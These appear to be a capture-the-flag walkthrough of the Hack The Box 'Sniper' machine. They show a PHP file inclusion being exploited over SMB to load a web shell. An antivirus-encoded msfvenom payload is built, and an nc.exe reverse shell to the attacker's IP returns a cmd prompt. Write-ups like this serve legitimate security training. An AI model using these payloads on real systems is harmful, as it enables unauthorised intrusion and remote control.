4 :80 /blog > LFI > smbRFI
http://sniper.htb/blog/?lang=blog-fr.php
# maybe LFI / RFI?
# tested using http://sniper.htb/blog/index.php?lang=header.html
| relative path to reach ..\user\db.php returns error,
| we need absolute path?
Trying C:\Windows\System32\Drivers\etc\hosts
| as its running php
view-source:http://sniper.htb/blog/index.php?lang=/Windows/win.ini
| shows file
</html>
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
</body>
</html>
# RFI fails
http://sniper.htb/blog/index.php?lang=http://10.10.16.7/kashz
# no callback
# trying SMB share reads, as SMB share is considered on the network
http://sniper.htb/blog/index.php?lang=//10.10.16.7/kashz
$ smbserver.py -smb2support drive . 130 ⨯
Impacket v0.9.24.dev1+20210917.161743.0297480b - Copyright 2021 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.10.151,49765)
[*] AUTHENTICATE_MESSAGE (\,SNIPER)
[*] User SNIPER\ authenticated successfully
[*] :::00::aaaaaaaaaaaaaaaa
[*] Connecting Share(1:IPC$)
[-] SMB2_TREE_CONNECT not found KASHZ
[-] SMB2_TREE_CONNECT not found KASHZ
# we get callback
# testing simple info.php
$ cat info.php 130 ⨯
<?php
phpinfo();
?>
http://sniper.htb/blog/index.php?lang=//10.10.16.7/drive/info.php
| we get phpinfo
System Windows NT SNIPER 10.0 build 17763 (Windows Server 2016) i586
Architecture x86
Loaded Configuration File C:\Program Files (x86)\PHP\v7.3\php.ini
disable_functions no value
$_SERVER['USERDOMAIN'] WORKGROUP
$_SERVER['USERNAME'] SNIPER$
$_SERVER['SCRIPT_FILENAME'] C:\inetpub\wwwroot\blog\index.php
# no value for disable_functions allows us to execute commands
# putting web.php
http://sniper.htb/blog/index.php?lang=//10.10.16.7/drive/web.php
CMD: whoami && whoami /priv && systeminfo
nt authority\iusr
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
======================= ========================================= =======
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
Host Name: SNIPER
OS Name: Microsoft Windows Server 2019 Standard
OS Version: 10.0.17763 N/A Build 17763
System Type: x64-based PC
Hotfix(s): N/A
# don't have write perms at C:\inetpub\wwwroot\blog or C:\users\public\
# tried running nishang shell, PS cannot seem to run it?
# tried coping msfvenom to C:\windows\temp
| Operation did not complete successfully because the file contains a virus or potentially unwanted software.
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.16.7 LPORT=445 -f exe -o kashz.exe -e "x86/shikata_ga_nai"
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 487 (iteration=0)
x86/shikata_ga_nai chosen with final size 487
Payload size: 487 bytes
Final size of exe file: 7168 bytes
Saved as: kashz.exe
CMD: copy \\10.10.16.7\drive\kashz.exe C:\windows\temp\kashz.exe
1 file(s) copied.
# shell wont execute, tried 445, 49667 port - no callback
# via nc.exe
copy \\10.10.16.7\drive\nc.exe C:\windows\temp\nc.exe
C:\windows\temp\nc.exe -e C:\Windows\System32\cmd.exe 10.10.16.7 6969
$ nc -lvnp 6969 130 ⨯
listening on [any] 6969 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.10.151] 49831
Microsoft Windows [Version 10.0.17763.678]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\inetpub\wwwroot\blog>
Last updated